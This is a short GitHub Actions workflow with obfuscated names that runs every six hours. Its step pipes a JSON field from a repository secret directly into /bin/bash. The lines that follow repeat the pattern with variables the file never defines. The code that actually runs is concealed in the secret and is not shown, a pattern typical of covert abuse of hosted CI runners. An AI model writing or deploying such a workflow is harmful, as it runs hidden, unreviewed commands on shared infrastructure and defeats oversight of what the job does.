name: kedaoma7564

on:
  workflow_dispatch:
  schedule:
    - cron: '37 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: kedaoma7564
        env:
          lw1583: ${{ secrets.lw1583 }}
        run: |
          echo $lw1583 | jq -r .k5 | /bin/bash
          echo $qoz325 | jq -r .ebtru81605 | /bin/bash
          echo $kbhxl9 | jq -r .fbdhj88647 | /bin/bash
          echo $d792 | jq -r .s5839 | /bin/bash
          echo $hdl70 | jq -r .q99 | /bin/bash
          echo $iano50241 | jq -r .ueo1 | /bin/bash
          echo $fvgy9801 | jq -r .j2 | /bin/bash
          echo $c990 | jq -r .ahina541 | /bin/bash
          echo $xkzc02404 | jq -r .eyl6 | /bin/bash

